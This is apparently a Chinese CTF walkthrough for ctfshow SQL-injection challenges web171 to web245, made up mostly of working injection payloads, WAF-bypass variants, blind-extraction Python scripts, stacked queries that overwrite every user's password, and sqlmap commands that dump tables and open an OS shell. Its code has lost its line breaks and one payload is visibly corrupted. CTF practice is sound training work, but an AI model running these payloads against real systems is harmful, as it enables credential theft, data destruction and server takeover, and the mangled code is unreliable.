目录
web171
web172
web173
web174
web175
web176
web177-179
web180-183
web184
web185
web187
web190
web191
web192
web193
web194
web195
web196
web197
web199
web201
web202
web203
web204
web205
web206
web207
web208
web209
web210
web211
web212
web213
web225
web245
web171
获取库名:1'union select 1,group_concat(schema_name),3 from information_schema.schemata%23获取表名:1'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()%23获取字段名:1'union select 1,group_concat(password,username),3 from ctfshow_user%23web172
这里可以使用database64加密。
1'union select 1,to_base64(password) from ctfshow_user where username="flag"%23web173
使用16进制进行转换
1' union select 1,hex(password),3 from ctfshow_user3 where username='flag'%23web174
进行写文件
1' union select 1,password from ctfshow_user4 into outfile '/var/www/html/1.txt'--+&page=1&limit打开1.txt获取flag
web175
这里可以使用脚本跑
import requests
def get_pwd_len(url):head = 1tail = 100ans = 0while head < tail:mid = (head + tail ) >> 1payload = f"1'&&if(length((select(password)from(ctfshow_user5)where(id=26)))>{mid},sleep(2),0)#"# print(uname)param = {'id': payload,'page': '1','limit': '10'}res = requests.get(url=url,params=param)try:r = requests.get(url,params=param,timeout=0.5)tail = midans = midexcept Exception as e :head = mid +1print(ans)# passwd长度为:45
url="http://c7c6c7b5-e27e-46b5-ac09-66d7f0ede948.challenge.ctf.show/api/v5.php"
get_pwd_len(url)def get_pwd(url):ans = ""for i in range(1, 46):# print(i)j = 46 - i# print(j)head = 32tail = 127while head <tail:mid = (head + tail) >> 1 #>>是位移运算符 右移一位就是除以二payload = f"1'&&if(ascii(substr((reverse(substr((select(password)from(ctfshow_user5)where(id=26))from({i}))))from({j})))>{mid},sleep(2),0)#"# print(uname)param = {'id': payload,'page': '1','limit': '10'}try:res = requests.get(url=url,params=param,timeout=0.5)tail = midexcept Exception as e:head = mid + 1if head != 32:ans += chr(head)else:breakprint(ans)
url="http://c7c6c7b5-e27e-46b5-ac09-66d7f0ede948.challenge.ctf.show/api/v5.php"
get_pwd(url)
无空格和逗号
web176
使用大小写绕过
-1'uNion seleCt 1,groUp_concAt(username,password),3 frOm ctfshow_user%23web177-179
使用括号绕过:-1'union(select(1),(group_concat(username,password)),(3)from(ctfshow_user))%23使用注释绕过:-1'union/**/select/**/1,group_concat(username,password),3/**/from/**/ctfshow_user%23反引号绕过:-1'union/**/select`id`,`username`,`password`from`ctfshow_user`%23web180-183
过滤了注释符:
-1'union%0cselect(1),(group_concat(username,password)),(3)from(ctfshow_user)where(1)and'1web184
过滤了很多,这里使用脚本测试
使用脚本
import requestsurl="http://6ca99d4f-ef75-4808-92e8-5fc1a7b9548e.challenge.ctf.show/select-waf.php"
flag="ctfshow{"def str_to_hex(s):return ''.join([hex(ord(c)).replace('0x','') for c in s])
for i in range(0,100):for j in "0123456789abcdefghijklmnopqrstuvwxyz-{}":data={
#'tableName':"ctfshow_user a inner join ctfshow_user b on b.pass like {}".format("0x"+str_to_hex(flag+j+"%"))'tableName':f"ctfshow_user group by pass having pass like {'0x'+str_to_hex(flag+j+'%')}"}r=requests.post(url=url,data=data).textif "$user_count = 1" in r:flag+=jprint(flag)if j=='}':exit()break这里使用了like模糊查询。
web185
数字的表示,使用脚本
import requestsurl = "http://47b18d10-5722-4603-961a-2ef4d5b872d8.challenge.ctf.show/select-waf.php"flag = 'ctfshow{'def createNum(n):num = 'true'if n == 1:return 'true'else:for i in range(n - 1):num += "+true"return numfor i in range(45):if i <= 8:continuefor j in range(127):data = {"tableName": f"ctfshow_user as a right join ctfshow_user as b on (substr(b.pass,{createNum(i)},{createNum(1)})regexp(char({createNum(j)})))"}r = requests.post(url, data=data)if r.text.find("$user_count = 43;") > 0:if chr(j) != ".":flag += chr(j)print(flag.lower())if chr(j) == "}":exit(0)breakweb187
loadfile盲注
import requestsurl="http://17e6ad41-8c34-4fb3-aa23-f9fbfc11d012.challenge.ctf.show/api/index.php"flag="ctfshow{"
for i in range(0,100):for j in "0123456789abcdefghijklmnopqrstuvwxyz-{}":payload="if((load_file('/var/www/html/api/index.php'))regexp('{}'),0,1)".format(flag+j)data={'username':payload,'password':1}r=requests.post(url=url,data=data)if "\\u5bc6\\u7801\\u9519\\u8bef" in r.text:flag+=jprint(flag)if j=='}':exit()breakweb190
无过滤的盲注
import requestsurl = "http://87a2c8d4-69ca-4617-b96c-ce3601bdc1a6.challenge.ctf.show/api/"result = ""
i = 0while True:i = i + 1head = 32tail = 127while head < tail:mid = (head + tail) >> 1# 查数据库 ctfshow_fl0g#payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()"# 查字段 id,f1ag#payload = "select group_concat(column_name) from information_schema.columns where table_name='ctfshow_fl0g'"# 查flagpayload = "select group_concat(f1ag) from ctfshow_fl0g"data = {'username': f"admin' and if(ascii(substr(({payload}),{i},1))>{mid},1,2)='1",'password': '1'}r = requests.post(url,data=data)if "密码错误" == r.json()['msg']:head = mid + 1else:tail = midif head != 32:result += chr(head)else:breakprint(result)web191
ord函数盲注
Author:Y4tacker
import requestsurl = "http://646c4493-3a66-407e-8ddf-c59355418a23.challenge.ctf.show/api/"result = ""
i = 0while True:i = i + 1head = 32tail = 127while head < tail:mid = (head + tail) >> 1# 查数据库 ctfshow_fl0g#payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()"# 查字段 f1ag#payload = "select group_concat(column_name) from information_schema.columns where table_name='ctfshow_fl0g'"# 查flagpayload = "select group_concat(f1ag) from ctfshow_fl0g"data = {'username': f"admin' and if(ord(substr(({payload}),{i},1))>{mid},1,2)='1",'password': '1'}r = requests.post(url,data=data)if "密码错误" == r.json()['msg']:head = mid + 1else:# print(r.text)tail = midlast = resultif head != 32:result += chr(head)else:breakprint(result)web192
过滤ord和ascll函数
import requests
import stringurl = "http://2c0073f7-8662-4a12-a742-f17e1818ed0a.chall.ctf.show/api/"
flagstr=" _{}-" + string.ascii_lowercase + string.digits
flag = ''
for i in range(1,45):for j in flagstr:payload = f"admin' and if(substr((select group_concat(f1ag) from ctfshow_fl0g),{i},1)regexp('{j}'),1,2)='1"data = {'username': payload,'password': '1'}r = requests.post(url, data=data)if "密码错误" == r.json()['msg']:flag += jprint(flag)if "}" == j:exit(0)breakweb193
过滤sustr
Author:feng
import requestsurl='http://fc1e9e65-4116-4635-aebc-05e37fef775f.challenge.ctf.show/api/'
flag=""
for i in range(0,100):for j in "0123456789abcdefghijklmnopqrstuvwxyz-,{}_":#payload="' or if((select group_concat(table_name) from information_schema.tables where table_schema=database()) like '{}',1,0)-- -".format(flag+j+"%")#payload="' or if((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flxg') like '{}',1,0)-- -".format(flag+j+"%")payload="' or if((select group_concat(f1ag) from ctfshow_flxg) like '{}',1,0)-- -".format(flag+j+"%")data={'username':payload,'password':1}#print(payload)r=requests.post(url=url,data=data)#print(payload)if r"\u5bc6\u7801\u9519\u8bef" in r.text:flag+=jprint(flag)if j=='}':exit()breakweb194
locate()正则注入
Author:Y4tacker
import requests
# 应该还可以用instr等函数,LOCATE、POSITION、INSTR、FIND_IN_SET、IN、LIKE
url = "http://dee436de-268a-408e-b66a-88b4c972e5f5.chall.ctf.show/api/"
final = ""
stttr = "flag{}-_1234567890qwertyuiopsdhjkzxcvbnm"
for i in range(1,45):for j in stttr:final += j# 查表名-ctfshow_flxg# payload = f"admin' and if(locate('{final}',(select table_name from information_schema.tables where table_schema=database() limit 0,1))=1,1,2)='1"# 查字段-f1ag# payload = f"admin' and if(locate('{final}',(select column_name from information_schema.columns where table_name='ctfshow_flxg' limit 1,1))=1,1,2)='1"payload = f"admin' and if(locate('{final}',(select f1ag from ctfshow_flxg limit 0,1))=1,1,2)='1"data = {'username': payload,'password': '1'}r = requests.post(url,data=data)if "密码错误" == r.json()['msg']:print(final)else:final = final[:-1]web195
堆叠注入,这里使用16进制
前面的是admin,后面的是111,就是将所有用户的密码修改为111,之后登陆即可。
使用16进制原因:$sql = "select pass from ctfshow_user where username = {$username};";(没有字符串单引号包围)
0x61646d696e;update`ctfshow_user`set`pass`=0x313131;
web196
payload:1;select(1)
web197
利用alter改名:1;alter table `ctfshow_user` change `pass` `feng` varchar(255); alter table `ctfshow_user` change `id` `pass` varchar(255)
import requestsurl = "http://5f5edc35-cd47-49e5-9252-5a3301edd9f3.challenge.ctf.show/api/"
for i in range(100):if i == 0:data = {'username': '0;alter table ctfshow_user change column `pass` `ppp` varchar(255);alter table ctfshow_user ''change column `id` `pass` varchar(255);alter table ctfshow_user change column `ppp` `id` ''varchar(255);','password': f'{i}'}r = requests.post(url, data=data)data = {'username': '0x61646d696e','password': f'{i}'}r = requests.post(url, data=data)if "登陆成功" in r.json()['msg']:print(r.json()['msg'])break#登陆成功 flag is ctfshow{1e8cd464-117c-4863-a8ea-0e7b83d3d9fe}
web199
payload:
1;show tablesctfshow_user
show tables;会显示表名,也就是ctfshow_user那么这个时候会将查出来的这个值当成密码,也就是密码为ctfshow_user
sqlmap注入
web201
referer绕过
//检测是否有注入点
python sqlmap.py -u http://e03b8694-2a59-4d02-96c2-fde5f26a427d.challenge.ctf.show/api/?id= --referer="ctf.show" --batch
//探测数据库名
python sqlmap.py -u http://e03b8694-2a59-4d02-96c2-fde5f26a427d.challenge.ctf.show/api/?id= --referer="ctf.show" --dbs --batch
//看到ctfshow_web数据库,探测表名
python sqlmap.py -u http://e03b8694-2a59-4d02-96c2-fde5f26a427d.challenge.ctf.show/api/?id= --referer="ctf.show" -D ctfshow_web --tables --batch
//获取一个表名ctfshow_user,获取列名
python sqlmap.py -u http://e03b8694-2a59-4d02-96c2-fde5f26a427d.challenge.ctf.show/api/?id= --referer="ctf.show" -D ctfshow_web -T ctfshow_user --columns --batch
//获取列名后看到三个列名,直接dump
python sqlmap.py -u http://e03b8694-2a59-4d02-96c2-fde5f26a427d.challenge.ctf.show/api/?id= --referer="ctf.show" -D ctfshow_web --T ctfshow_user --dump --batchweb202
data绕过:
//检测是否有注入点
python sqlmap.py -u http://e03b8694-2a59-4d02-96c2-fde5f26a427d.challenge.ctf.show/api/?id= --referer="ctf.show" --data="id=1" --batch
//探测数据库名
python sqlmap.py -u http://e03b8694-2a59-4d02-96c2-fde5f26a427d.challenge.ctf.show/api/?id= --referer="ctf.show" --data="id=1" --dbs --batch
//看到ctfshow_web数据库,探测表名
python sqlmap.py -u http://e03b8694-2a59-4d02-96c2-fde5f26a427d.challenge.ctf.show/api/?id= --referer="ctf.show" --data="id=1" -D ctfshow_web --tables --batch
//获取一个表名ctfshow_user,获取列名
python sqlmap.py -u http://e03b8694-2a59-4d02-96c2-fde5f26a427d.challenge.ctf.show/api/?id= --referer="ctf.show" --data="id=1" -D ctfshow_web -T ctfshow_user --columns --batch
//获取列名后看到三个列名,直接dump
python sqlmap.py -u http://e03b8694-2a59-4d02-96c2-fde5f26a427d.challenge.ctf.show/api/?id= --referer="ctf.show" --data="id=1" -D ctfshow_web --T ctfshow_user --dump --batchweb203
请求方式绕过(必须加index.php)
//检测是否有注入点
python sqlmap.py -u http://e03b8694-2a59-4d02-96c2-fde5f26a427d.challenge.ctf.show/api/?id= --referer="ctf.show" --data="id=1" --method=PUT --herders="Content-Type: text/plain"--batch
//探测数据库名
python sqlmap.py -u http://e03b8694-2a59-4d02-96c2-fde5f26a427d.challenge.ctf.show/api/?id= --referer="ctf.show" --data="id=1" --method=PUT --herders="Content-Type: text/plain" --dbs --batch
//看到ctfshow_web数据库,探测表名
python sqlmap.py -u http://e03b8694-2a59-4d02-96c2-fde5f26a427d.challenge.ctf.show/api/?id= --referer="ctf.show" --data="id=1" --method=PUT --herders="Content-Type: text/plain" -D ctfshow_web --tables --batch
//获取一个表名ctfshow_user,获取列名
python sqlmap.py -u http://e03b8694-2a59-4d02-96c2-fde5f26a427d.challenge.ctf.show/api/?id= --referer="ctf.show" --data="id=1" --method=PUT --herders="Content-Type: text/plain" -D ctfshow_web -T ctfshow_user --columns --batch
//获取列名后看到三个列名,直接dump
python sqlmap.py -u http://e03b8694-2a59-4d02-96c2-fde5f26a427d.challenge.ctf.show/api/?id= --referer="ctf.show" --data="id=1" --method=PUT --herders="Content-Type: text/plain" -D ctfshow_web --T ctfshow_user --dump --batchweb204
包含cookie
>python sqlmap.py -u http://41ecd4df-c94a-4612-af16-2b0b6c834e9e.challenge.ctf.show/api/index.php --data="id=1" --method=PUT --referer=ctf.show --headers="Content-Type: text/plain" --cookie="PHPSESSID=5gqkmm2fh7l226lf4s9q4nl444; ctfshow=885b1983b7f7963b7d736fd8b93c185f" -D ctfshow_web -T ctfshow_user --dump --batchweb205
访问安全连接
它先访问的getToken,
--safe-url 设置在测试目标地址前访问的安全链接--safe-freq 设置两次注入测试前访问安全链接的次数
python sqlmap.py -u http://158eb741-2a3a-4643-a9d6-94360dc171b9.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://158eb741-2a3a-4643-a9d6-94360dc171b9.challenge.ctf.show/api/getToken.php" --safe-freq=1 -D ctfshow_web -T ctfshow_flax -C flagx --dump --batchweb206
符号闭合
python sqlmap.py -u http://cd7e2227-9bd9-4929-9e06-ae3781d38591.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://cd7e2227-9bd9-4929-9e06-ae3781d38591.challenge.ctf.show/api/getToken.php" --safe-freq=1 -D ctfshow_web --prefix="')" --suffix="#"-T ctfshow_flax --dump --batch--prefix:前置闭合
--suffix:后置闭合
web207
--temper自己的脚本编写
python sqlmap.py -u http://7a02b099-af2d-45fe-9a06-562855b134c9.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://7a02b099-af2d-45fe-9a06-562855b134c9.challenge.ctf.show/api/getToken.php" --safe-freq=1 --tamper=web207 --batch -D ctfshow_web -T ctfshow_flaxca -C flagvc --dumpweb208
大小写空格前后包含
python sqlmap.py -u "http://fafc4bcc-ec09-4b48-96d1-665c8e7e967d.challenge.ctf.show/api/index.php" --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://fafc4bcc-ec09-4b48-96d1-665c8e7e967d.challenge.ctf.show/api/getToken.php" --safe-freq=1 --prefix="')" --tamper="space2comment(替换空格),randomcase(替换大小写)" --batch -D ctfshow_web -T ctfshow_flaxcac -C flagvca --dumpweb209
过滤了星号等号和空格
编写脚本web209
python sqlmap.py -u http://aa386482-7cfb-4336-b39a-ae4c279921a4.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://aa386482-7cfb-4336-b39a-ae4c279921a4.challenge.ctf.show/api/getToken.php" --safe-freq=1 --batch --tamper=web209 -D ctfshow_web -T ctfshow_flav -C ctfshow_flagx --dumpweb210
对base64进行解密
python sqlmap.py -u http://1c7a89da-dee8-4374-9d72-d1cdedb9583a.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://1c7a89da-dee8-4374-9d72-d1cdedb9583a.challenge.ctf.show/api/getToken.php" --safe-freq=1 --batch --tamper=web210 -D ctfshow_web -T ctfshow_flavi -C ctfshow_flagxx --dumpweb211
绕过翻转字符/
python sqlmap.py -u http://cd0fdb00-049a-4e5a-8ce1-547261224fb3.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://cd0fdb00-049a-4e5a-8ce1-547261224fb3.challenge.ctf.show/api/getToken.php" --safe-freq=1 --batch --tamper=web210 -D ctfshow_web -T ctfshow_flavia -C ctfshow_flagxxa --dumpweb212
过滤单引号空格,继续使用210脚本
sqlmap>python sqlmap.py -u http://e44ed589-be5e-4423-8e2c-4bca30a67e6c.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://e44ed589-be5e-4423-8e2c-4bca30a67e6c.challenge.ctf.show/api/getToken.php" --safe-freq=1 --batch --tamper=web210 -D ctfshow_web -T ctfshow_flavis --dumpweb213
使用os-shell一键getshell
python sqlmap.py -u http://517718e5-3471-4848-9ecf-ac4b22a4a01e.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://517718e5-3471-4848-9ecf-ac4b22a4a01e.challenge.ctf.show/api/getToken.php" --safe-freq=1 --tamper=web210 --dump --os-shell --batch
上传文件后进行命令执行操作。
web225
堆叠注入handler读取数据。
payload:
?username=1';show tables;handler ctfshow_flagasa open;handler ctfshow_flagasa read first;handler ctfshow_flagasa close;&page=1&limit=10报错注入
web245
模板
api/?id=1' and extractvalue(1,concat(0x7e,([]),0x7e))-- #&page=1&limit=10表名
api/?id=1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e))-- #&page=1&limit=10字段名
api/?id=1' and extractvalue(1,conccmn_name) from information_schema.columns where table_name='ctfshow_flagsa'),0x7e))-- #&page=1&limit=10数据 分开读
api/?id=1' and extractvalue(1,concat(0x7e,(select left(flag1,30) from ctfshow_flagsa),0x7e))-- #&page=1&limit=10
api/?id=1' and extractvalue(1,concat(0x7e,(select right(flag1,30) from ctfshow_flagsa),0x7e))-- #&page=1&limit=10
api/?id=1' and extractvalue(1,concat(0x7e,(select left(flag1,30) from ctfshow_flagsa),0x7e))-- #&page=1&limit=10
![[Java、Android面试]_14_Retrofit的作用](https://img-blog.csdnimg.cn/direct/b82920516c2349879c209900ef431af6.png)